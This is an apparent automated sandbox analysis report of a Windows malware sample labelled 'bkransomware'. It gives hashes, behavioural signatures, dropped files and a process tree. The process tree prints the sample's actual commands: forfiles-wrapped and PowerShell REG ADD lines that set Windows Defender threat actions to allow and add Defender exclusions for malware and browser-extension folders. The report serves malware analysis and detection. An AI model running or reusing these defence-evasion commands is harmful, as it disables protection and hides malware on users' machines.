Analysis
-
max time kernel
136s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20240910-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240910-en, locale:en-us, os:windows10-2004-x64, system -
submitted
03/10/2024, 12:35
Static task
static1
Behavioral task
behavioral1
Sample
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Resource
win10v2004-20240910-en
General
-
Target
2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
-
Size
6.7MB
-
MD5
bc58787697d3dfab922e9bbe376c7055
-
SHA1
06c8a66f338c809e73d1e7453b39b65be3558aec
-
SHA256
57dc9ae71f85b37c7968d4f3fea193ccb3d915d9afee8ec4fd165d3096f04561
-
SHA512
3648e7bf20cb61ec35979c8a9bcd2255ea79f83b9b29a23396dba72fd144e17cee380acf730c3ebcb2648f9d2d50cda766034ab543079e995496cb1cc21616ba
-
SSDEEP
196608:ebeOQSYdZtHckBGJ0soHJtOd4sGaVKJv2CSJG:EVYvVckBiQj5ak9S
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid | Process
1904 | powershell.exe
3312 | powershell.EXE
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2629364133-3182087385-364449604-1000\Control Panel\International\Geo\Nation | 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Indirect Command Execution 1 TTPs 5 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid | Process
5040 | forfiles.exe
4916 | forfiles.exe
736 | forfiles.exe
3448 | forfiles.exe
2840 | forfiles.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\manifest.json | 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json | 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Drops file in System32 directory 3 IoCs
description | ioc | Process
File created | C:\Windows\system32\GroupPolicy\gpt.ini | 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe
Drops file in Program Files directory 14 IoCs
description | ioc (Process for every row: 2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe)
File created | C:\Program Files (x86)\YjQMAHbWU\faAvUyh.xml
File created | C:\Program Files (x86)\CMKMbRFSZeNU2\PGEJJPrBnsnUg.dll
File created | C:\Program Files (x86)\CMKMbRFSZeNU2\ymlANau.xml
File created | C:\Program Files (x86)\JXqrxIFSrhCmC\AZuAtnT.dll
File created | C:\Program Files (x86)\JXqrxIFSrhCmC\DDLWHNh.xml
File created | C:\Program Files (x86)\YjQMAHbWU\GJPBsU.dll
File created | C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi
File created | C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\LVzhRug.dll
File created | C:\Program Files (x86)\dLghTkXXJYUn\JjkVvCR.dll
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja
File created | C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\OzBNeCy.xml
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
Drops file in Windows directory 1 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\GqmqubHZBeiIxpo.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid | pid_target | Process | procid_target
228 | 5116 | WerFault.exe | 83
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4764 | schtasks.exe
1468 | schtasks.exe
3080 | schtasks.exe
4636 | schtasks.exe
3084 | schtasks.exe
4012 | schtasks.exe
4092 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 56 IoCs
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1904 | powershell.exe
Token: SeDebugPrivilege | 4868 | powershell.exe
Token: SeDebugPrivilege | 2776 | powershell.exe
Token: SeDebugPrivilege | 3312 | powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-03_bc58787697d3dfab922e9bbe376c7055_bkransomware.exe"1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3084 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2648
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:3656
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3548 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:800
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1036
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:2720
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:1500
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4848
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1096
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3444
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3532
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:960
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1720
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4944
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4612
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4840
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:384
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:668
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3528
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1284
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4012
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1724
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2636
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4348
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:2764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3852
-
-
-
[depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CMKMbRFSZeNU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CMKMbRFSZeNU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JXqrxIFSrhCmC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JXqrxIFSrhCmC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YjQMAHbWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YjQMAHbWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLghTkXXJYUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dLghTkXXJYUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UQYVlFmkpVlhWwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UQYVlFmkpVlhWwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YIXdnjwIixpMFthL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YIXdnjwIixpMFthL\" /t REG_DWORD /d 0 /reg:64;" | PID:2776
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

[depth 3] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:32 | PID:4916
- System Location Discovery: System Language Discovery

[depth 4] C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:32 | PID:516
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CMKMbRFSZeNU2" /t REG_DWORD /d 0 /reg:64 | PID:4928
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:32 | PID:3600

